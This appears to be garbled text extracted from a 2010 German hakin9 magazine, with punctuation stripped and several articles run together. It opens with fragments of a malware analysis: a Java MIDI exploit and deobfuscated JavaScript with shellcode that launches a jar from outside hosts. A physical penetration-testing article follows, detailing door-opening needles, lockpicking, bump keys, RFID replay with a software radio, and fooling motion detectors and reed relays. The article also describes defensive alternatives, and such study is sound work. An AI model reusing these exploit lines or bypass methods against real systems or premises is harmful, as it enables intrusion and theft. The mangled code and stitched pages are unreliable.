vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
